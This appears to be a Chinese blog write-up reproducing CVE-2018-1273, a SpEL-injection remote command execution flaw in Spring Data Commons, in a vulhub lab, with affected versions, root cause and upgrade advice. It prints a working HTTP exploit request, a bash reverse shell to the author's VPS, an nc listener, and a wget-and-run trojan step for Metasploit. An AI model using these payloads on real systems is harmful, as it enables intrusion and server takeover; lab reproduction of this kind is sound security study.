漏洞复现-CVE-2018-1273-Spring Data Commons 远程命令执行

 

 

 

 

 

0x00 实验环境

攻击机：Win 10

靶场：docker拉的vulhub靶场

0x01 影响版本

Spring Data Commons 1.13 - 1.13.10 (Ingalls SR10)

Spring Data REST 2.6 - 2.6.10 (Ingalls SR10)
Spring Data Commons 2.0 to 2.0.5 (Kay SR5)
Spring Data REST 3.0 - 3.0.5 (Kay SR5)

0x02 漏洞复现

（1）访问页面时，是一个spring常见的错误页面，看到这个页面离有戏不远了：

 （2）通过扫目录的方式发现敏感页面/users：

 （3）在输入一些数据后点击注册，并使用burp抓包，修改数据包为如下payload并发送：

POST /users?page=&size=5 HTTP/1.1
Host: x.x.x.x:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 130
Origin: http://x.x.x.x:8080
Connection: close
Referer: http://x.x.x.x:8080/users
Cookie: settingStore=1630480512401_0
Upgrade-Insecure-Requests: 1

username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("命令")]=&password=&repeatedPassword=

（4）与CVE-2017-8046-Spring Data Rest 远程命令执行的复现方式有点类似，都是在某个接口存在远程代码执行，这里只需要将红色字体修改为反弹shell的命令即可获取到服务器的shell：

首先对需要执行的命令执行编码：

bash -i >& /dev/tcp/vps的ip/7777 0>&1

在网址：

http://www.jackson-t.ca/runtime-exec-payloads.html

 （5）然后在自己的vps开启监听：

 nc -lvp 7777

 因为某种原因，这里我的shell弹不过来，遇到真实环境的时候是可以试试这个办法的，另外我再说个思路。

 （6）完整拿shell思路，真实环境，遇到无法弹shell的可以先从自己服务器下载一个exe或者elf的木马：

wget http://x.x.x.x:7890/test.elf

这个亲测是可以下载成功的，然后给shell赋予一个777的执行权限：

chmod 777 ./test.elf

然后我们在msf开启监听即可获取到shell，所以说，没法直接反弹的话就可以自己找方法拿到shell：

 这样是不是很聪明呢！^-^

0x03 漏洞原理

Spring Data是一个用于简化数据库访问，并支持云服务的开源框架，Spring Data Commons是Spring Data下所有子项目共享的基础框架。Spring Data Commons 在2.0.5及以前版本中，存在一处SpEL表达式注入漏洞，攻击者可以注入恶意SpEL表达式以执行任意命令。

参考这篇文章：https://www.cnblogs.com/hac425/p/9656747.html

0x04 修复建议

即为升级：

 2.0.x users should upgrade to 2.0.6

1.13.x users should upgrade to 1.13.11

Older versions should upgrade to a supported branch

0x05 参考文献

https://github.com/vulhub/vulhub/tree/master/spring/CVE-2018-1273

https://xz.aliyun.com/t/2269

0x06 免责声明

本漏洞复现文章仅用于学习、工作与兴趣爱好，并立志为网络安全奉献一份力量，凡是利用本博客相关内容的无良hackers造成的安全事故均与本人无关！